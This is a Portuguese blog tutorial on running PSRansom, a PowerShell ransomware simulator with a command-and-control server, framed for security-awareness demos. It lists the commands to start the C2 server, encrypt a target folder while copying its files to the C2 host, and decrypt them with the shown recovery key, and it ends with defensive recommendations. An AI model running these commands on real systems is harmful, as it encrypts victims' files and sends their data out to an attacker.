Open in app

Sign in

Write

Sign in

PSRansom — Simulação de Ransomware com C2

Marcos Henrique
100security
Published in
4 min readOct 13, 2022

PSRansom ​​é um script escrito em PowerShell que permite simular o funcionamento de um Ransomware. É um script que você pode utilizar por exemplo em uma apresentação de conscientização sobre os riscos e o impacto que um ransomware pode causar.

🔴 O uso indevido desta técnica é de sua total responsabilidade e está sujeito as penalizações prevista na Lei 12.737.

01 — Passo

Realize o clone do projeto PSRansom

git clone https://github.com/JoelGMSec/PSRansomcd PSRansomls -l

02 — Passo

Inicie o C2 Server através do comando a seguir :

pwsh C2Server.ps1 + 80

03 — Passo

No host Windows criei a pasta 100SECURITY com alguns arquivos como exemplo.

04 — Passo

Realize o download do PSRansom no Windows e execute o comando a seguir:

  • C:\100SECURITY : Pasta Alvo
  • 192.168.0.76 : Servidor C2
  • 80 : Porta de conexão com o servidor C2
  • -x : Realiza a cópia dos arquivos para o servidor C2
.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x

05 — Passo

No servidor C2 o atacante recebe a lista de arquivos que foram criptografados e a Chave de Recuperação.

Chave de Recuperação : WNLmTxjnDpzZGaEF4AsUYgi5

Arquivos criptografados com a extensão .psr

06 — Passo

Dentro da pasta C2Files o atacante recebe uma cópia de todos os arquivos antes da criptografia.

cd CS2Filesls -l

07 — Passo

Observe que foi criado o arquivo readme.txt contendo a Chave de Recuperação dos arquivos.

Recovery Key : WNLmTxjnDpzZGaEF4AsUYgi5

08 — Passo

Para recuperar os arquivos basta digitar o comando a seguir :

.\PSRansom.ps1 -d C:\100SECURITY -K WNLmTxjnDpzZGaEF4AsUYgi5

Arquivos recuperados com sucesso!

🔴 Exibindo uma mensagem da Tela do Usuário

Para exibir a mensagem basta utilizar o parâmetro -demo :

.\PSRansom.ps1 -e C:\100SECURITY -s 192.168.0.76 -p 80 -x -demo

💀 Mensagem!

Se o usuário clicar em Pay Now! é exibido um pop-up na tela.

🔓 Observações

O impacto e o prejuízo financeiro que este tipo de ataque por causar nas empresa é muito grande, segue algumas recomendações :

  • Conscientize de forma constante os colaboradores da sua empresa, sobre os riscos de segurança
  • Realize exercícios e simulações de Phishing, Ransomware, Engenharia Social, etc.
  • Invista em soluções de segurança como EDRs, AVs, Firewall, WAF, etc.
  • Se possível monte um time interno de segurança em sua empresa para realizar simulações de ataques reais.
  • Contrate uma consultoria especializada para avaliar seu ambiente de forma independente e periódica.
  • Leve a segurança dos dados da sua empresa e de seus clientes a sério!

Fonte : www.100security.com.br/psransom

100security
Psransom
Ransomware
Red Team
Hacker

--

--

Marcos Henrique
100security

Written by Marcos Henrique

24 Followers
Editor for

100security.com.br

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams